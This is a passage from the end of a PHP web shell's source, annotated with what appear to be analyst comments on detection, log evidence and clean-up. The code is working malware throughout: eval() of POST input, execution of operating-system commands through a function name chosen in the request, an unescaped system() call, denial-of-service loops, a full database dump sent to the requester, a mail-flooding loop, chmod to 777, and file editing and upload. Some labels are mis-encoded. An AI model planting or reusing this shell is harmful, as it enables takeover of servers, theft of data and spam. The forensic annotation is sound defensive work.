// how existing site files get modified in place; compare web-root files against a
// known-good copy when this shell is found.
944if($_POST['fedit'] && $_POST['namefe']){
945if(is_writable($_REQUEST['address'])){
946
947
948$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
949fwrite($opensave,html_entity_decode($_POST['fedit']));
950fclose($opensave);alert("File Saved Successful !");
951}else{alert("Permission Denied !");}
952}
// Arbitrary PHP execution: the POST field 'evalsource' is passed to eval() as-is and
// runs with the privileges of the PHP process. Because the payload travels in the
// request body it does not show up in standard access logs; request-body logging or
// a WAF rule on the parameter name is needed to see it.
953if ($_POST['evalsource']){
954
955eval($_POST['evalsource']);
956}
// do=eval only renders the input form for the handler above.
957if($_GET['do']=="eval"){
958echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
959}
// Handler do=info: host reconnaissance page. It discloses OS details (php_uname),
// PHP version, the disable_functions and safe_mode state collected earlier in the
// file, free/total disk space of "/", whether cURL is loaded, which database client
// functions exist and the server admin address. A request with do=info is typically
// the first thing an operator sends after the shell is planted.
960if($_GET['do']=="info"){
961
962if(ini_get('register_globals')){
963$registerg="Enable";
964}else{
965$registerg="disable";
966}
967if(extension_loaded('curl')){
968$curls="Enable";
969}else{
970$curls="disable";
971}
// Each check overwrites $db_on, so only the last matching driver is reported.
972if(@function_exists('mysql_connect')){
973$db_on = "Mysql : On";
974};
975if(@function_exists('mssql_connect')){
976$db_on = "Mssql : On";
977};
978if(@function_exists('pg_connect')){
979$db_on = "PostgreSQL : On";
980};if(@function_exists('ocilogon')){
981$db_on = "Oracle : On";
982};
983
// sizee() is defined outside this part of the file.
984echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
985exit;
986}
// Handler do=cmd: operating-system command execution.
// The value of 'execmethod' is used as a function name and called with 'command' as
// its argument (a PHP variable-function call). The form offers system/exec/passthru/
// popen, but nothing restricts the name to those options.
// Detection: the form uses method=get, so 'command' and 'execmethod' appear in the
// query string of access logs; on the host, look for shells or utilities started as
// children of the web server / PHP worker.
// Hardening note: disable_functions only helps against the names it lists, and only
// while no other execution path (such as the eval handler in this file) is reachable.
987if ($_GET['do']=="cmd"){
988echo $head.'
989<form method=get action="'.$me.'">
990<p align="center">
991<textarea rows="19" name="S1" cols="87">';
992if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
993echo $_GET['execmethod']($_GET['command']);}
// Same call for values that arrive in a POST body.
994if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
995echo $_POST['execmethod']($_POST['command']);}
996
// popen branch: the process is started but its output is not read here.
997if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
998popen($_GET['command'],"r");}
999
1000echo'</textarea></p><p align="center">
1001<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
1002 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option>
1003</select><input type="submit" value="eXecute">
1004</p></form>'.$end;exit;}
// Handler do=symlink: renders two forms whose default target is "symlink.txt" in the
// current working directory.
1005if ($_GET['do']=="symlink"){
1006echo $head.'
1007<form method=post action="'.$me.'">
1008<p align="center">
1009SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
1010<form method=post action="'.$me.'"><p align="center">
1011
1012SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
1013</p></form>'.$end;exit;}
// POST 'ad1syp' -> 'ad2syp': PHP symlink() with both paths taken from the request.
// Symlinks planted in a web-readable directory can expose files outside the web
// root; during clean-up, list links under the document root and check where they
// point.
1014if ($_POST['ad1syp'] && $_POST['ad2syp']){
1015if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
1016alert("Symlink Worked !");
1017}else{
1018alert("Symlink Not Worked !");
1019}}
// POST 'ad1syc' / 'ad2syc': both values are concatenated, unescaped, into a shell
// command line passed to system().
1020if ($_POST['ad1syc'] && $_POST['ad2syc']){
1021if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
1022alert("Symlink Worked !");
1023}else{alert("Symlink Not Worked !");}
1024}
// Local denial-of-service handlers. do=d0slocal prints two links; following either
// one makes the PHP worker serving that request exhaust CPU, memory or stack.
// Because the file calls set_time_limit(0) at the top, max_execution_time does not
// stop these requests; limits enforced outside the script (memory_limit, the process
// manager's request timeout, OS resource limits) are what contain them.
// Symptom to correlate: a request with 'dosthisserver' in the query string followed
// by a worker pinned at 100% CPU or a worker crash/restart.
1025if ($_GET['do']=="d0slocal"){
1026echo $head.'
1027<p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
// Variant 1: an endless loop ($i is never incremented) that repeatedly raises a
// number of roughly five million digits to the third power with bcpow().
1028if ($_GET['dosthisserver']=="1"){
1029function dosserver(){
1030$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
1031for($i=0;$i<2;){
1032$buff=bcpow($junk, '3', 2);
1033$buff=null;
1034}
1035}
1036dosserver();
1037}
// Variant 2: unbounded recursion.
1038if ($_GET['dosthisserver']=="2"){
1039function cx(){cx();}
1040 cx();
1041}
1042if ($_GET['do']=="����ת��"){
1043$hash=null;
1044if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
1045$hash=md5($_GET['stringtoh']);
1046}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
1047$hash=sha1($_GET['stringtoh']);
1048}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
1049$hash=crc32($_GET['stringtoh']);
1050}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
1051$hash=base64_encode($_GET['stringtoh']);
1052}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
1053$hash=base64_decode($_GET['stringtoh']);
1054}
1055echo $head.'
1056<form method=get action="'.$me.'">
1057<p align="center">����ת��<br><input type=hidden name=do value=����ת��>
1058<input name=stringtoh size=58><select name=hashtoh>
1059<option value="md5">MD5</option>
1060<option value="crc32">CRC32</option>
1061<option value="sha1">SHA1</option>
1062<option value="b64e">Base64 Encode!</option>
1063<option value="b64d">Base64 Decode!</option>
1064<br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="����ת��">
1065
1066</p></form>'.$end;exit;}
1067if ($_GET['do']=="dump"){
1068echo $head.'<p align="center">';
1069echo '<table border=1 width=400 style="border-collapse: collapse" bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>�������ݿ�</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>���ݿ���� Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value=" Dump! " ></td></tr></table></form></center></table>'.$end;exit;}
// Database dump / exfiltration handler, triggered by POST 'username' + 'dbname' +
// 'method' (with 'server' and 'password').
// Steps visible below: connect with the supplied credentials, write a CREATE TABLE
// statement and one INSERT per row for every table into a file in the current
// working directory, then stream that file to the client as an attachment.
// The dump file is not deleted afterwards. Detection and clean-up:
//  - files named "Dump-<dbname>-<YYYY-MM-DD>.sql" or ".sql.gz" in web directories
//    (they remain downloadable by anyone who knows the name);
//  - an unusually large response from this script with a Content-Disposition header;
//  - a burst of SHOW TABLES / SHOW CREATE TABLE / SELECT * in the database logs.
// 'dbname' is also used unchanged inside the file name and the SQL text.
1070if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
1071$date = date("Y-m-d");
1072$dbserver = $_POST['server'];
1073$dbuser = $_POST['username'];
1074$dbpass = $_POST['password'];
1075$dbname = $_POST['dbname'];
1076$file = "Dump-$dbname-$date";
1077$method = $_POST['method'];
// Any 'method' other than 'sql' produces a gzip-compressed dump.
1078if ($method=='sql'){
1079$file="Dump-$dbname-$date.sql";
1080$fp=fopen($file,"w");
1081}else{
1082$file="Dump-$dbname-$date.sql.gz";
1083$fp = gzopen($file,"w");
1084}
// Writes one chunk to the dump through the matching plain or gzip API.
1085function write($data) {
1086global $fp;
1087if ($_POST['method']=='sql'){
1088fwrite($fp,$data);
1089}else{
1090gzwrite($fp, $data);
1091}}
1092mysql_connect ($dbserver, $dbuser, $dbpass);
1093mysql_select_db($dbname);
1094$tables = mysql_query ("SHOW TABLES");
1095while ($i = mysql_fetch_array($tables)) {
1096 $i = $i['Tables_in_'.$dbname];
1097 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
1098 write($create['Create Table'].";\n\n");
1099 $sql = mysql_query ("SELECT * FROM ".$i);
1100 if (mysql_num_rows($sql)) {
1101 while ($row = mysql_fetch_row($sql)) {
1102 foreach ($row as $j => $k) {
1103 $row[$j] = "'".mysql_escape_string($k)."'";
1104 }
1105 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
1106 }
1107 }
1108}
1109if ($method=='sql'){
1110fclose ($fp);
1111}else{
1112gzclose($fp);}
// Send the finished file back to the requester in 64 KiB chunks.
1113header("Content-Disposition: attachment; filename=" . $file);
1114header("Content-Type: application/download");
1115header("Content-Length: " . filesize($file));
1116flush();
1117
1118$fp = fopen($file, "r");
1119while (!feof($fp))
1120{
1121 echo fread($fp, 65536);
1122 flush();
1123}
1124fclose($fp);
1125}
1126
// Handler do=mail: renders a form with recipient, subject, body and a repeat count.
1127if ($_GET['do']=="mail"){
1128echo $head.'
1129<form method=post action="'.$me.'">
1130<p align="center">
1131Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
// Sends the same message 'numail' times through the server's own mail() transport,
// i.e. mail flooding or spam that originates from the compromised host. Detection:
// bursts of identical messages from the web server account in the MTA logs; the
// host's address showing up on blocklists is a common follow-on symptom.
1132if ($_POST['admail'] && $_POST['submail'] ){
1133for($mi=0;$mi<intval($_POST['numail']);$mi++){
1134mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
1135}
// Handler do=db: renders the database client (sqlclienT()) and exits.
1136if($_GET['do']=="db"){
1137echo $head;sqlclienT();echo $end;
1138exit;
1139}
// Permission change: 'file2ch' (path) and 'chmodnow' (digits) come from the request;
// the mode is built by prefixing "0" to the submitted value and passed as a string.
// The form below uses method=get and pre-fills 777, so look for world-writable files
// and for 'file2ch' in access-log query strings.
1140if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
1141$chmodnum2=$_REQUEST['chmodnow'];
1142chmod($_REQUEST['file2ch'],"0".$chmodnum2);
1143}
1144if($_GET['do']=="chmod"){
1145echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
1146
1147}
1148/* if($_GET['do']=="edit"){
1149if($_GET['filename']=="dir"){
1150if(is_readable($_GET['address'])){
1151chdir($_GET['address']);}else{alert("Permission Denied !");}
1152
1153}} */
// Computes $backaddresss, the path used by the file browser's "Back" link.
// The current working directory is split on the platform separator and the text of
// its last segment is blanked out with str_replace() across all segments.
1154$araddresss=explode($slash,getcwd());
1155$matharrayy=count($araddresss)-1;
1156$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
1157for($countback=0;$countback<count($addr1backk);$countback++){
1158$arraybacke[$countback]=$slash.$addr1backk[$countback];
1159$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
1160}
// Re-join the remaining segments with the separator of the detected platform.
1161if ($slash=="\\"){
1162$countback=null;
1163$backdirwin=null;
1164for($countback=1;$countback<count($addr1backk);$countback++){
1165$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
1166$backdirwin=$addr1backk[0].$backdirwin;
1167$backaddresss=$backdirwin;
1168}else{
1169$countback=null;
1170$backdirwin=null;
1171for($countback=1;$countback<count($addr1backk);$countback++){
1172$backdirwin=$backdirwin."/".$addr1backk[$countback];}
1173$backdirwin=$addr1backk[0].$backdirwin;
1174$backaddresss=$backdirwin;
1175$backaddresss=str_replace("\\","/",$backaddresss);
1176}
/**
 * Analyst note: directory-size helper of the file browser.
 *
 * Walks $path with opendir()/readdir(), skipping '.', '..' and symbolic links.
 * File sizes are added to $size; for a sub-directory the recursive result is
 * assigned to $size, replacing the running total rather than adding to it.
 * closedir() is called even when opendir() did not return a handle.
 *
 * @param string $path directory to measure
 * @return int size value as computed above
 */
1177function calc_dir_size($path)
1178{
1179$size = 0;
1180if ($handle = opendir($path))
1181{
1182while (false !== ($entry = readdir($handle)))
1183{
1184$current_path = $path . '/' . $entry;
1185if ($entry != '.' && $entry != '..' && !is_link($current_path))
1186{
1187if (is_file($current_path))
1188$size += filesize($current_path);
1189elseif (is_dir($current_path))
1190$size = calc_dir_size($current_path);
1191}
1192}
1193}
1194closedir($handle);
1195return $size;
1196}
/**
 * Analyst note: builds the HTML link shown for one file in the browser listing.
 *
 * When the current working directory contains the document root ($basep), the
 * link points at the file's public URL (path relative to the document root), so
 * the web server serves it directly. Otherwise the link opens the shell's own
 * editor (?do=edit&address=...&filename=...), which reads the file through PHP
 * and therefore reaches files outside the web root.
 * The file name is inserted into the markup without escaping.
 *
 * @param string $parsef file name inside the current working directory
 * @return string anchor element for the listing
 */
1197function openf($parsef){
1198global $basep,$slash;
1199
// strpos() yields an offset when $basep is found and false otherwise; strlen() of
// that value is used as the "found" test.
1200if(strlen(strpos(getcwd(),$basep))>=1){
1201$rr=str_replace($basep,"",getcwd());
1202$rr=str_replace("\\","/",$rr);
1203$diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
1204}else{
1205$diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
1206}
1207return $diropen;
1208}
1209if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
1210if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
1211$ad=getcwd();
1212$hand=opendir("$ad");
1213$coi=0;
1214$coi2=0;
1215
1216while (false !== ($fileee = readdir($hand))) {
1217
1218
1219 if ($fileee != "." && $fileee != "..") {
1220 if (filetype($fileee)=="dir"){
1221 if ($coi %2){
1222$colort='"#e7e3de"';
1223}else{
1224$colort='"#e4e1de"';
1225
1226}
1227$coi++;
1228$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
1229<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
1230<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1231<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1232;}
1233else{
1234
1235 if ($coi2 %2){
1236$colort='"#e7e3de"';
1237}else{
1238$colort='"#e4e1de"';
1239}
1240
1241$coi2++;
1242$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
1243<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
1244<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1245<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1246;}
1247}
1248}
// Final output of the page. Prints $head, a "Now Directory" bar (getcwd(),
// printdrive(), and a ?do=back link built from $backaddresss), the listing
// fragments $fil and $file, a table of action forms, and finally $end.
//
// Every action row opens its form through $formg, which is a GET form that
// targets the script itself, so the submitted values travel in the query
// string, which web-server access logs normally record:
//   - command row: hidden do=cmd, text field "command" (pre-filled with "id"),
//     select "execmethod" offering system / exec / passthru, hidden "address"
//   - Change Dir: "address"; Create Dir: "cdirname"; Create File: "cfilename";
//     Copy File: "copyname" and "cpyto"
//   - Upload: a second, nested POST multipart form with the file field "filee";
//     this is the only row whose payload is not in the query string
// NOTE(review): the code that acts on these parameters is outside this excerpt;
// presumably do=cmd hands "command" to the PHP function named in "execmethod".
// Confirm against the handler.
//
// Detection notes: the parameter names above (do=cmd, execmethod, command,
// cdirname, cfilename, cpyto, filee) and the fixed system/exec/passthru option
// list are stable strings to match in access logs and in content scans of the
// web root. Earlier in the script a do=remove request unlinks the script
// itself, so the file may already be gone and request logs may be the only
// remaining evidence.
//
// getcwd() and $me are concatenated into the markup without HTML escaping, and
// several value= attributes are unquoted, so a path containing spaces or markup
// characters breaks the form or injects into the rendered page.
//
// The label in front of " : " on the command row is mis-encoded in this copy;
// it is runtime output and is left untouched. The stray </form> after <tr> in
// the Upload row and the nested form are also part of the original markup.
1249echo $head.'
1250<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
1251<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
1252</tr></table>'.$fil.$file.'</table>
1253<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
1254<tr>
1255<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1256<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'����ִ�� : </font></td>
1257<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
1258 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option>
1259</select> <input type=submit value="Execute"></form></td></tr>
1260<tr>
1261<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1262<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
1263<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
1264<input type=submit value=Change></form></td></tr>
1265<tr>
1266<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1267<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
1268<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1269<tr>
1270<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1271<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
1272<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1273<tr></form>
1274<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1275<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
1276<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
1277<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
1278<input type=submit value=Upload /></form></td></tr>
1279<tr>
1280<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1281<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
1282<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
1283'.$end;
1284?>